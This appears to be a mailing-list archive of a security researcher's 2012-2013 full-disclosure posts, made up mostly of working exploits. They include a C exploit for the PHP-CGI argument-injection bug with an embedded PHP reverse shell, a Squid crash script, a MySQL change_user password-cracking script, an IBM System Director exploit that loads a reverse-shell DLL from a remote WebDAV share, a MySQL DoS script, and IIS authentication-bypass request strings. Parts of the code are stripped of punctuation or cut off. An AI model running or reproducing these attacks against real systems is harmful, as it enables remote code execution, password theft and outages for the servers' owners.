Apache PHP Remote Exploit - apache-magika.c

2013-10-30 Thread king cope
(see attachment)

/* Apache Magica by Kingcope */
/* gcc apache-magika.c -o apache-magika -lssl */
/* This is a code execution bug in the combination of Apache and PHP.
On Debian and Ubuntu the vulnerability is present in the default install
of the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
the binary because this binary has a security check enabled when installed with
Apache http server and this security check is circumvented by the exploit.
When accessing the php-cgi binary the security check will block the request and
will not execute the binary.
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
check is done when the php.ini configuration setting cgi.force_redirect is set
and the php.ini configuration setting cgi.redirect_status_env is set to no.
This makes it possible to execute the binary bypassing the Security check by
setting these two php.ini settings.
Prior to this code for the Security check getopt is called and it is possible
to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
-d switch. If both values are set to zero and the request is sent to the server
php-cgi gets fully executed and we can use the payload in the POST data field
to execute arbitrary php and therefore we can execute programs on the system.
apache-magika.c is an exploit that does exactly the prior described. It does
support SSL.
/* Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch
Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2
Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up
Unaffected versions are patched by CVE-2012-1823.
 /'\rrq rk
 .  // \\  .
apache-magica.c by Kingcope

#include stdio.h
#include stdlib.h
#include unistd.h
#include getopt.h
#include sys/types.h
#include stddef.h
#include openssl/rand.h
#include openssl/ssl.h
#include openssl/err.h
#include netdb.h
#include sys/socket.h
#include netinet/in.h

typedef struct {
	int sockfd;
	SSL *handle;
	SSL_CTX *ctx;
} connection;

void usage(char *argv[])
  printf(usage: %s --target target --port port --protocol http|https  \
  --reverse-ip ip --reverse-port port [--force-interpreter interpreter]\n,

char poststr[] = POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F \
 %%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64 \
 +%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73 \
 %%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E \
 %%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63 \
 %%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62 \
 %%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74 \
 %%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68 \
 %%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F \
 %%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63 \
 %%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73 \
 %%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n \
 Host: %s\r\n \
 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 \
 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n \
 Content-Type: application/x-www-form-urlencoded\r\n \
 Content-Length: %d\r\n \
 Connection: close\r\n\r\n%s;
char phpstr[] = ?php\n \
set_time_limit(0);\n \
$ip = '%s';\n \
$port = %d;\n \
$chunk_size = 1400;\n \
$write_a = null;\n \
$error_a = null;\n \
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n \
$daemon = 0;\n \
$debug = 0;\n \
if (function_exists('pcntl_fork')) {\n \
	$pid = pcntl_fork();	\n \
	if ($pid == -1) {\n \
		printit(\ERROR: Can't fork\);\n \
		exit(1);\n \
	}\n \
	if ($pid) {\n \
		exit(0);\n \
	}\n \
	if (posix_setsid() == -1) {\n \
		printit(\Error: Can't setsid()\);\n \
		exit(1);\n \
	}\n \
	$daemon = 1;\n \
} else {\n \
	printit(\WARNING: Failed to daemonise.\);\n \
}\n \
chdir(\/\);\n \
umask(0);\n \
$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n \
if (!$sock) {\n \
	printit(\$errstr ($errno)\);\n \
	exit(1);\n \
}\n \
$descriptorspec = array(\n \
   0 = array(\pipe\, \r\),\n \
   1 = array(\pipe\, \w\),\n \
   2 = array(\pipe\, \w\)\n \
);\n \
$process = proc_open($shell, $descriptorspec, $pipes);\n \
if (!is_resource($process)) {\n \
	printit(\ERROR: Can't spawn shell\);\n \
	exit(1);\n \
}\n \
stream_set_blocking($pipes[0], 0);\n \
stream_set_blocking($pipes[1], 0);\n \
stream_set_blocking($pipes[2], 0);\n \
stream_set_blocking($sock, 0);\n \
while (1) {\n \
	if (feof($sock)) {\n \
		printit(\ERROR: Shell connection 

OpenSSL,OpenSSH ecdsa authentication code inconsistent return values.. no vulnerability?

2013-09-13 Thread king cope
Hello lists,

Attached is the blog post for the mentioned issues that in its shape
are not a vulnerability, still interesting to see.




ProFTPd mod_sftp/mod_sftp_pam invalid pool allocation in kbdint authentication

2013-09-11 Thread king cope
Hi there!

See my blog post about the mentioned vulnerability.




Mikrotik RouterOS 5.* and 6.* sshd remote preauth heap corruption

2013-09-03 Thread king cope
Hello lists,

here you find the analysis of a vulnerability I recently discovered.

Mikrotik RouterOS 5.* and 6.* sshd remote preauth heap corruption


Additionally it includes a way to drop into a development shell for
recent Mikrotik RouterOS versions.

Cheers :


Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure

2013-08-07 Thread king cope
I posted the advisory to make administratos aware that it will be
still possible to read files with the apache uid even when suEXEC is
in place.
suEXEC is installed on many hosting providers. I read the cpanel site
describing the patches [1], tough standart apache httpd does not have
these patches installed.
SymLinksIfOwnerMatch will not help in this attack scenario because the
.htaccess file overwrites this Options directive.
If a hacker sees an apache installation using suEXEC from an attackers
perspective it does not matter where the bug resides, either in Apache
or in suEXEC.  He just wants to circumvent the suEXEC protection so he
can go the way described in the text I posted. This will aid him to
escalate privileges further.


Squid-3.3.5 DoS PoC

2013-07-15 Thread king cope
#Squid Crash PoC
#Copyright (C) Kingcope 2013
#tested against squid-3.3.5
#this seems to be the patch for the vulnerability:
#The squid-cache service will respawn, looks like a kind of assert exception:
#2013/07/15 20:48:36 kid1| Closing HTTP port
#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...
#2013/07/15 20:48:36 kid1|   Finished.  Wrote 0 entries.
#2013/07/15 20:48:36 kid1|   Took 0.00 seconds (  0.00 entries/sec).
#FATAL: Bungled (null) line 9: snmp_access deny all
#Squid Cache (Version 3.2.11): Terminated abnormally.
#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys
#Maximum Resident Size: 33312 KB
#Page faults with physical i/o: 0
#Memory usage for squid via mallinfo():
#total space in arena:4100 KB
#Ordinary blocks: 4046 KB  7 blks
#Small blocks:   0 KB  0 blks
#Holding blocks:   564 KB  2 blks
#Free Small blocks:  0 KB
#Free Ordinary blocks:  53 KB
#Total in use:4610 KB 112%
#Total free:53 KB 1%
#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for
#2013/07/15 20:48:39 kid1| Process ID 2990

use IO::Socket;

my $sock = IO::Socket::INET-new(PeerAddr = '',
  PeerPort = '3128',
  Proto= 'tcp');
$a = yc x 2000;
print $sock HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n;
while($sock) {

Re: Kingcopes AthCon 2012 Slides Notes -- Video online

2013-03-06 Thread king cope
The video of my talk is online now. Happy watching.



2012/5/24 HI-TECH . isowarez.isowarez.isowa...@googlemail.com:
 Hello lists,

 you can view my slides  notes for my talk entitled Uncovering
 Zero-Days and advanced fuzzing held at AthCon 2012 at the following





New Blog Post: Attacking the Windows 7/8 Address Space Randomization

2013-01-24 Thread king cope
Hello List,
Below is a link to my new Blog Post,

I hope you enjoy it!


MySQL Local/Remote FAST Account Password Cracking

2012-12-04 Thread king cope
FAST Cracking of MySQL account passwords locally or over the network (post-auth)

(to the maintainers: you don't need to patch this, looks alot like a
minor bug, prolly documented :D)

I found a method to crack mysql user passwords locally or over the
network pretty efficiently.
During Tests it was possible to test 5000 passwords per second over the network.
The method is as follows:

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user, this command can be used
as the name suggests to change a user during a mysql session.
Since mysql is very fast in doing this it is much more powerful to crack
passwords rather than reconnecting every time to the mysql server to
brute force passwords
(what would be VERY slow).
Since the SALT does not change (and this is the weak point) in the
change_user command
it is a convienent way to crack passwords. (When connecting to mysql
in each connection
attempt the SALT is always different and sent out by the server).

Below is an example script and an example which uses John the Ripper's
to generate passwords.

The passwords pass for the user crackme is cracked in a matter of seconds.
(about 10 passwords are tested in 20 seconds)
cracking script

use Net::MySQL;


my $mysql = Net::MySQL-new(
 hostname = '',
 database = 'test',
 user = user,
 password = secret,
 debug = 0,

$crackuser = crackme;

while(stdin) {
$currentpass = $_;

$vv = join \0,
$currentpass, $mysql-{salt}, 
) . \0;
if ($mysql-_execute_command(\x11, $vv) ne undef) {
print [*] Cracked! -- $currentpass\n;
example session:

hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! -- pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted



IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)

2012-12-03 Thread king cope
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope

IBM System Director has the port 6988 open. By using a special request
to a vulnerable server,
the attacker can force to load a dll remotely from a WebDAV share.

The following exploit will load the dll from
the wootwoot.dll is a reverse shell that will send a shell back to the
attacker (the code has to be inside the dll initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not
on 5.2.30 SP2 and above.
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880
There was a prior CVE for it, the CVE states the attack can load local
files only, using the WebDAV server remote file can be loaded too.
To scan for this software you can enter the following (by using pnscan):
./pnscan -wM-POST /CIMListener/ HTTP/1.1\r\nHost:
localhost\r\nContent-Length: 0\r\n\r\n -r HTTP ipblock 6988

use IO::Socket;
#1st argument: target host
my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0],
 PeerPort = 6988,
 Proto= 'tcp');
$payload =
qq{?xml version=1.0 encoding=utf-8 ?
PROPERTY NAME=Description TYPE=string
  VALUESample CIM_AlertIndication indication/VALUE
PROPERTY NAME=PerceivedSeverity TYPE=uint16
PROPERTY NAME=ProbableCause TYPE=uint16
PROPERTY NAME=IndicationTime TYPE=datetime
$req =
M-POST /CIMListener/isowarez.de\\director\\wootwoot HTTP/1.1\r\n
.Host: $ARGV[0]\r\n
.Content-Type: application/xml; charset=utf-8\r\n
.Content-Length: . length($payload) .\r\n
.Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n
.CIMOperation: MethodCall\r\n
.CIMExport: MethodRequest\r\n
.CIMExportMethod: ExportIndication\r\n\r\n;
print $sock $req . $payload;

while($sock) {



MySQL (Linux) Stack based buffer overrun PoC Zeroday

2012-12-03 Thread king cope
(see attachment)


Description: Binary data

MySQL (Linux) Heap Based Overrun PoC Zeroday

2012-12-03 Thread king cope
(see attachment)



Description: Binary data

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

2012-12-03 Thread king cope
(see attachment)



Description: Binary data

MySQL Denial of Service Zeroday PoC

2012-12-03 Thread king cope
(see attachment)

5.5.19-log on SuSE Linux

DoS exploit:

use Net::MySQL;
use Unicode::UTF8 qw[decode_utf8 encode_utf8];

  my $mysql = Net::MySQL-new(
  hostname = '',   # Default use UNIX socket
  database = 'test',
  user = monty,
  password = python,
  debug = 1,
  $mysql-_execute_command(\x12, \x00\x00\x00\x00 foo);
  for ($k=0;$k5;$k++) {
  $a .=A$k;
  for ($k=0;$k5;$k++) {
  $a .=/A$k;
# SELECT example
  $mysql-query(SELECT UpdateXML('a$abccc/bd/d/a', '/a', 
'efff/e') AS val1);
  my $record_set = $mysql-create_record_iterator;
  while (my $record = $record_set-each) {
  printf First column: %s Next column: %s\n,
  $record-[0], $record-[1];

Crash Log:

/usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql 
120108 12:55:28 - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong
and this may fail.

It is possible that mysqld could use up to
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K
bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x8e6fa48
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 0xa868b35c thread_stack 0x3

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query ((nil)): is an invalid pointer
Connection ID (thread ID): 12

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.

Version: '5.5.19-log'  socket: '/var/run/mysql/mysql.sock'  port: 3306  Source 
[New Thread 0xa8f1db70 (LWP 7907)]
120108 13:01:51 [Warning] IP address '' could not be resolved: 
Name or service not known
120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xa8f1db70 (LWP 7907)]
mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 , pos=value optimized 
out, flags=65535) at /root/mysql-5.5.19/sql/sql_repl.cc:1043
1043log_file_name, (llstr(my_b_tell(log), llbuff2), 
(gdb) x/10i $eip
= 0x81bf54a mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370:   mov
   0x81bf54d mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373:   mov
   0x81bf550 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376:   mov
   0x81bf554 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380:   mov
   0x81bf557 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383:   call   
0x8541560 llstr
   0x81bf55c mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388:   mov
   0x81bf562 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394:   lea
   0x81bf568 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400:   mov
   0x81bf56c mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404:   lea
   0x81bf572 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410:   mov
(gdb) i r
eax0xa8f1c804   -1460549628
ecx0x0  0
edx0xa8f1c805   -1460549627
esp0xa8f1be50   0xa8f1be50
ebp0xa8f1c868   0xa8f1c868
esi0xa8f1c81a   -1460549606
edi0xa8f1c804   -1460549628
eip0x81bf54a0x81bf54a mysql_binlog_send(THD*, char*, 

MySQL Remote Preauth User Enumeration Zeroday

2012-12-03 Thread king cope
(see attachment)



Description: Binary data

Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday

2012-12-03 Thread king cope
Correct, I tell that from experience because I've seen many
configurations where the least privileged user has file privs enabled.
If we leave it that way the attackers will be more happy, it's not
decision to patch it or not, just a hint .



2012/12/2 Yves-Alexis Perez cor...@debian.org:
 On dim., 2012-12-02 at 21:17 +0100, king cope wrote:
 My opinion is that the FILE to admin privilege elevation should be patched.
 What is the reason to have FILE and ADMIN privileges seperated when
 with this exploit
 FILE privileges equate to ALL ADMIN privileges.

 Maybe because you might not want admins to have read/write access to the
 filesystem anyway?


Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-17 Thread king cope
Hi Lists,

it seems Microsoft doesn't want to patch the vulnerabilities I posted
back in June,
at least not in the July update.

The posting included some important bugs in the Internet Information
Services, one of their
flagship products:

The July Security Bulletin doesn't mention any bug.

I wonder if Microsoft will silently patch the vulnerabilities or just
bluntly ignore them.
I understand that Microsoft doesn't want to make a big deal about the
impact and exposure like in the past,
yet I believe that admins should be informed about the threats by
their very side.
You have to remember that I put much effort into finding these
vulnerabilities and you get them for free.
With resolving the bugs Microsoft proves that they care about security
even if these vulnerabilties
where disclosed uncoordinated yet free to patch.


IIS 6.0/7.5 Vulnerabilities [moderate risk] - ISOWAREZ BDAY RELEASE

2012-06-12 Thread king cope

Title: Microsoft IIS 6.0 with PHP installed Authentication Bypass

Affected software:
Microsoft IIS 6.0 with PHP installed
(tested on Windows Server 2003 SP1 running PHP5)

By sending a special request to the IIS 6.0 Service running PHP the attacker can
successfully bypass access restrictions.

Take for example:
1.) IIS/6.0 has PHP installed
2.) There is a Password Protected directory configured
-- An attacker can access PHP files in the password protected
directory and execute them without supplying proper credentials.
-- Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php

IIS/6.0 will gracefully load the PHP file inside the admin directory
if the ::$INDEX_ALLOCATION postfix is appended to directory name.
This can result in accessing administrative files and under special
circumstances execute arbirary code remotely.

Title: Microsoft IIS 7.5 Classic ASP Authentication Bypass

Affected Software:
Microsoft IIS 7.5 with configured Classic ASP and .NET Framework 4.0
installed (.NET Framework 2.0 is unaffected, other .NET frameworks
have not been tested)
(tested on Windows 7)

By appending :$i30:$INDEX_ALLOCATION to the directory serving the
classic ASP file access restrictions can be successfully bypassed.

Take this Example:
1.) Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files)
2.) There is a password protected directory configured that has
administrative asp scripts inside
3.) An attacker requests the directory with :$i30:$INDEX_ALLOCATION
appended to the directory name
4.) IIS/7.5 gracefully executes the ASP script without asking for
proper credentials

Title: Microsoft IIS 7.5 .NET source code disclosure and authentication bypass

Affected Software:
Microsoft IIS/7.5 with PHP installed in a special configuration
(Tested with .NET 2.0 and .NET 4.0)
(tested on Windows 7)
The special configuration requires the Path Type of PHP to be set to
Unspecified in the Handler Mappings of IIS/7.5

The authentication bypass is the same as the previous vulnerabilities:
Requesting for example
http://victimIIS75/admin:$i30:$INDEX_ALLOCATION/admin.php will run
the PHP script without asking for proper credentials.

By appending /.php to an ASPX file (or any other file using the .NET
framework that is not blocked through the request filtering rules,
like misconfigured: .CS,.VB files)
IIS/7.5 responds with the full source code of the file and executes it
as PHP code. This means that by using an upload feature it might be
possible (under special circumstances) to execute arbitrary PHP code.
Example: Default.aspx/.php

Cheerio and signed,
